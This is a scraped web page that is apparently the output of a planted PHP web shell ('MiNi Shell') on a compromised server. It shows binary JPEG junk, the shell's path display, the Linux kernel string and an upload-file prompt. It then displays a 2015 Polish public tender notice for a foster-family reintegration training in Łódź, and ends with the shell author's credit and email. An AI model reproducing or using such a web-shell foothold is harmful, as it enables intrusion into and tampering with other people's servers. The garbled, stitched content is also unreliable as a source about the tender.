JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150519/72093-N-2015.html

<p class="kh_header"><b>Łódź: Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenia specjalistycznego szkolenia dla osób współpracujących z rodzicami zastępczymi i rodzinnymi domami dziecka, w szczególności koordynatorów rodzinnej pieczy zastępczej, pod nazwą Reintegracja rodziny w kontekście ustawy o wspieraniu rodziny i systemie pieczy zastępczej.</b><br>
<b>Numer ogłoszenia: 72093 - 2015; data zamieszczenia: 19.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenia specjalistycznego szkolenia dla osób współpracujących z rodzicami zastępczymi i rodzinnymi domami dziecka, w szczególności koordynatorów rodzinnej pieczy zastępczej, pod nazwą Reintegracja rodziny w kontekście ustawy o wspieraniu rodziny i systemie pieczy zastępczej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: 
Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenia specjalistycznego szkolenia dla osób współpracujących z rodzicami zastępczymi i rodzinnymi domami dziecka,
w szczególności koordynatorów rodzinnej pieczy zastępczej, pod nazwą Reintegracja rodziny w kontekście ustawy o wspieraniu rodziny i systemie pieczy zastępczej.
2.Oznaczenie według Wspólnego  Słownika Zamówień CPV:
80 500 000- 9  usługi szkoleniowe 
80 510 000- 2 usługi szkolenia specjalistycznego
3.Szacunkowa ilość osób:
1)Zamawiający przewiduje skierować na szkolenie 15 osób;
2)Liczba osób skierowanych na szkolenie może ulec zmianie zmniejszyć się, bez prawa do roszczeń z tego tytułu przez Wykonawcę,
3)Podstawą przyjęcia na szkolenie jest imienna lista osób, którą Zamawiający przekazuje Wykonawcy w terminie 3 dni od podpisania umowy.
4.Celem szkolenia jest:
Zwiększenie wiedzy uczestników w obszarze reintegracji rodziny oraz roli rodziny biologicznej
 dla rozwoju i funkcjonowania dziecka, a także nabycie umiejętności korzystania z różnych metod
 i technik celem reintegracji rodziny. 
5.Program szkolenia obejmuje:
Program szkolenia obejmuje 3 dni szkoleniowe, łącznie 18 godzin lekcyjnych na terenie miasta Łodzi.
1)Przekazanie wiedzy w zakresie:
a)Prawnych i psychologicznych aspektów reintegracji rodziny,
b)Obszarów współpracy koordynatora rodzinnej pieczy zastępczej, asystenta rodziny
 i pracownika socjalnego,
c)Znaczenia rodziny biologicznej dla prawidłowego funkcjonowania i rozwoju dziecka,
d)Stylu przywiązania jako wskaźnika jako jakości relacji i możliwości reintegracyjnych rodziny, 
e)Technik mediacji i komunikacji, a także umiejętności motywowania do zimna
 w procesie reintegracji rodziny,
f)Roli specjalistów oraz instytucji wspierających w procesie reintegracji rodziny.
6.Organizacja szkolenia
1)Usługa szkoleniowa winna być przeprowadzona w formie warsztatowej na terenie miasta Łodzi i obejmować:
a)Przygotowanie i przekazanie Zamawiającemu do akceptacji w terminie 3 dni
od podpisania umowy, harmonogramu szkolenia zawierającego
 w szczególności rozbicie na poszczególne dni, godziny oraz bloki tematyczne wraz
 z podaniem nazwisk osób prowadzących poszczególne zajęcia,
b)Zapewnienie kadry trenerskiej - co najmniej jeden psycholog lub pedagog mający doświadczenie i kwalifikacje w przeprowadzeniu szkoleń obejmujących wyżej wymienione zagadnienia,
c)Przygotowanie i druk materiałów dydaktycznych i programów szkolenia dla każdego uczestnika szkolenia oraz osoby monitorującej zbindowane lub w inny trwały sposób połączone,
d)Zapewnienie sal wykładowych adekwatnych do wielkości grupy wraz ze sprzętem
 i materiałami niezbędnymi do przeprowadzenia szkolenia (np. rzutnik, ekran, flipchart) oraz warunków pracy zgodnych z przepisami bezpieczeństwa i higieny pracy, a także zaplecza sanitarnego i higienicznego oraz środków czystości,
e)Przygotowanie oraz druk dokumentów potwierdzających ukończenie szkolenia, które winny być przekazane przez Wykonawcę uczestnikom szkolenia na ostatnich zajęciach,
f)Przeprowadzenie ankiety ewaluacyjnej na zakończenie zajęć (wzór ankiety musi być przekazany do akceptacji Zamawiającemu w terminie 3 dni od podpisania umowy), opracowanie wyników ewaluacji i przekazanie ich wraz z ankietami w terminie 7 dni od zakończenia szkolenia Zamawiającemu,
g)Prowadzenie i przechowywanie  do dnia 31.12.2020 r. następującej dokumentacji
 z przebiegu szkolenia:
Programu nauczania,
Dziennika zajęć edukacyjnych zawierających listę obecności, wymiar godzin oraz temat zajęć,
Rejestru wydawanych dokumentów potwierdzających ukończenie szkolenia,
Materiałów szkoleniowych,
h)Przekazanie Zamawiającemu, w terminie 7 dni od zakończenia szkolenia, potwierdzonych za zgodność z oryginałem kopii dokumentów wymienionych w części 6 pkt. 1 lit. g,
i)Bezpłatny catering w postaci serwisu kawowego (kawa, śmietanka lub mleko
 do kawy, herbata, cukier, trzy rodzaje ciastek, woda mineralna gazowana
 i niegazowana, soki owocowe).
7. Miejsce organizacji szkolenia:
1)Zajęcia odbywać się będą w sali dydaktycznej na terenie miasta Łodzi z dogodnym dojazdem środkami komunikacji miejskiej. Nie dopuszcza się usytuowania sal szkoleniowych w piwnicach i suterenach. Wykonawca zobowiązuje się zapewnić odpowiednie warunki lokalowe i socjalne z odpowiednim oświetleniem, ogrzewaniem i wentylacją; dostępem
 do toalety  i bieżącej, ciepłej wody.
2)Wykonawca jest zobowiązany do podania w formularzu ofert dokładnego adresu realizacji szkolenia. Zamawiający zastrzega sobie prawo kontroli jednostki szkoleniowej w zakresie zapewnienia odpowiednich warunków lokalowych przed rozpoczęciem szkolenia. Zamawiający ma prawo żądać zmiany sali, jeśli uzna że nie spełnia ona wymogów SIWZ. 
3)Wykonawca zobowiązany jest przeprowadzić kurs zgodnie z liczbą godzin i programem przedstawionym w ofercie, bez względu na ewentualne przerwy (choroby wykładowców, awarie, itp.).
8. Szkolenie musi mieć opiekuna z ramienia Wykonawcy, czyli osobę która będzie odpowiedzialna 
za organizację szkolenia, nadzór merytoryczny, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
9. Czas realizacji szkolenia:
Zamawiający wymaga 18 godzin lekcyjnych ( godzina lekcyjna to 45 minut, przerwa na posiłek
 nie wlicza się do czasu trwania zajęć). Zajęcia nie mogą rozpoczynać się przed godziną 08.00
 i kończyć się później niż o godz. 16.00 (3 spotkania x 1 grupa x 6 godzin lekcyjnych). 
10. Zamawiający nie wyraża zgody na dołączanie uczestników szkolenia do innych grup szkoleniowych.
11. Zamawiający będzie miał prawo do wizytacji zajęć edukacyjnych w trakcie trwania szkolenia.
12. Należność za realizację zamówienia będzie wynikać z przemnożenia ceny brutto określonej
 na jedną osobę przez liczbę uczestników, którzy ukończyli szkolenie.
13. Cena jednostkowa podana przez Wykonawcę ustalona jest na cały okres obowiązywania umowy
 i nie podlega podwyższeniu.
14. Należność za przedmiot umowy będzie płatna w terminie do 30 dni od daty dostarczenia prawidłowo wystawionej faktury Zamawiającemu do jego siedziby tj. Miejskiego Ośrodka Pomocy Społecznej w Łodzi ul. Piotrkowska 149. 
15. Wymagania stawiane Wykonawcy:
1)Wymagana jest należyta staranność przy realizacji zobowiązań umowy,
2)Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
3)Określenie przez Wykonawcę telefonów kontaktowych i numerów faksu oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia;
16. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
17. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia; 
18. Każdy Wykonawca w prowadzonym postępowaniu może złożyć tylko jedną ofertę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.(załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.(załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca wykaże, że dysponuje, co najmniej jednym psychologiem lub pedagogiem mającym  doświadczenie i kwalifikacje w przeprowadzeniu szkoleń obejmujących wyżej wymienione zagadnienia.
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami (załącznik nr 7 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca wykaże, że dysponuje, co najmniej jednym psychologiem lub pedagogiem mającym  doświadczenie i kwalifikacje w przeprowadzeniu szkoleń obejmujących wyżej wymienione zagadnienia.
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami (załącznik nr 7 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.(załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę 
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 3 zastępuje
 się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione
 do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym
 albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca  zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów 
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu
 na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia, zdolności finansowe lub ekonomiczne innych podmiotów, niezależnie od charakteru prawnego łączącego
 go z nim stosunków, zobowiązany jest udowodnić Zamawiającymi, iż będzie dysponował
 tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych  podmiotów do oddania mu do  dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać  w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy, ubiegającemu się  o zamówienie odpowiedniego zasobu oraz wskazywać:
a) jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu,
b)w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę, 
przy wykonywaniu zamówienia,
c) jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem,
d) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia,
11. Jeżeli Wykonawca wykazuje spełnianie warunków o których mowa w art.22 ust. 1 polega
 na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia zamawiający żąda
 od Wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczeń o  braku podstaw
 do wykluczenia z postępowania z powodu niespełnienia  warunków, o których mowa w art. 24 ust 1 ustawy Prawo zamówień publicznych (załącznik nr 3). 
Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę,
 który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy  Wykonawca w wyniku zamierzonego działania
 lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający
 jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza
 z postępowania o udzielenie zamówienie Wykonawcy, który udowodnił, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
dokument określający zasady reprezentacji oraz osoby uprawnione do  reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy,
wykaz usług o tym samym charakterze, co przedmiot zamówienia, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert,  jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, w przypadku szkoleń okresowych lub ciągłych wykonuje ( załącznik nr 6 
do SIWZ),
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie 
do dysponowania tymi osobami (co najmniej jeden psycholog, pedagog mający doświadczenie i kwalifikacje w przeprowadzeniu szkoleń obejmujących wyżej wymienione zagadnienia)(załącznik nr 7 do SIWZ).
Jeżeli Wykonawca polega na zasobach innych podmiotów na zasadach określonych
 w art. 26 ust. 2b ustawy Prawo zamówień publicznych lub wykazuje spełnianie warunków,
  o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych powołując
 się na zasoby innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych,  a podmioty te będą brały udział w realizacji części zamówienia,   składa dokumenty zgodnie z opisem zawartym w Specyfikacji Istotnych Warunków Zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Ilość wykonanych usług o tym samym charakterze,co przedmiot zamówienia, w okresie - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę w umowie  w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uml.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi 
 ul. Piotrkowska 149, 90 - 440 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2015 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łodzi 
ul. Piotrkowska 149, 90 - 440 Łódź Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com